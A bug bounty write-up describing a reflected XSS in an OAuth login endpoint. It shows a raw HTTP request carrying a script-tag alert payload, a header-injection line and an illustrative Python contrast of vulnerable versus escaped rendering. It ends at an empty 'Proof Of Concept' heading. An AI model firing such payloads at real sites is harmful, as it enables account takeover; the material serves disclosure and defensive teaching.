Reflected XSS on a Public Program

Hi all, my name is Naveen J, AKA thevillagehacker. This is my very first write-up, and I thought I should contribute some resources to the community.


I always wanted to be a very good hunter, so I decided to start with low-hanging fruit, and I chose to find some XSS on any of the Public Programs on HackerOne.

Technical Analysis

I intercepted the login request from and sent it to the repeater and observed the way the OAuth works. The uses as an OAuth service; when you click login, it will redirect you to and will let you log in if you have a legitimate account. So I decided to check for reflected XSS or any open redirect issues to grab the OAuth token to take over the user's account.

&Set-Cookie: <script>alert(“Hacked By Deathstroke”)</script> <script>alert("Hacked By Deathstroke")</script>


GET /oauth2/login/? <script>alert("Hacked By Deathstroke")</script> HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


<script>alert("Hacked By Deathstroke")</script>
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3982
Vary: Origin
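
The reflection seen in the request and response above, next to a server-side fix, as an added example that is not part of the original write-up. The write-up does not show the server code, so the page template, the function names and the assumption that the request target is echoed into the HTML body are illustrative.

```python
import html
from urllib.parse import unquote

# Constructed sample modelled on the request target in the write-up.
SAMPLE_TARGET = '/oauth2/login/?<script>alert("Hacked By Deathstroke")</script>'

# Hypothetical page template; the real application's markup is not shown on the page.
PAGE = "<html><body><p>Signing in via: {target}</p></body></html>"


def split_target(target):
    """Return (path, percent-decoded query) for a raw request target."""
    path, _, query = target.partition("?")
    return path, unquote(query)


def render_vulnerable(target):
    """Echo the decoded query into HTML as-is: markup in the URL becomes markup in the page."""
    path, query = split_target(target)
    return PAGE.format(target=f"{path}?{query}")


def render_hardened(target):
    """Same page, with the reflected value HTML-escaped and defensive headers added."""
    path, query = split_target(target)
    body = PAGE.format(target=html.escape(f"{path}?{query}", quote=True))
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "X-Frame-Options": "SAMEORIGIN",
        "X-Content-Type-Options": "nosniff",
        # Second layer: inline script is refused even if an escaping bug exists elsewhere.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }
    return headers, body


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_TARGET))
    hardened_headers, hardened_body = render_hardened(SAMPLE_TARGET)
    print(hardened_body)
```

Escaping happens after percent-decoding, so an encoded form of the same value is neutralised as well.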

Proof Of Concept
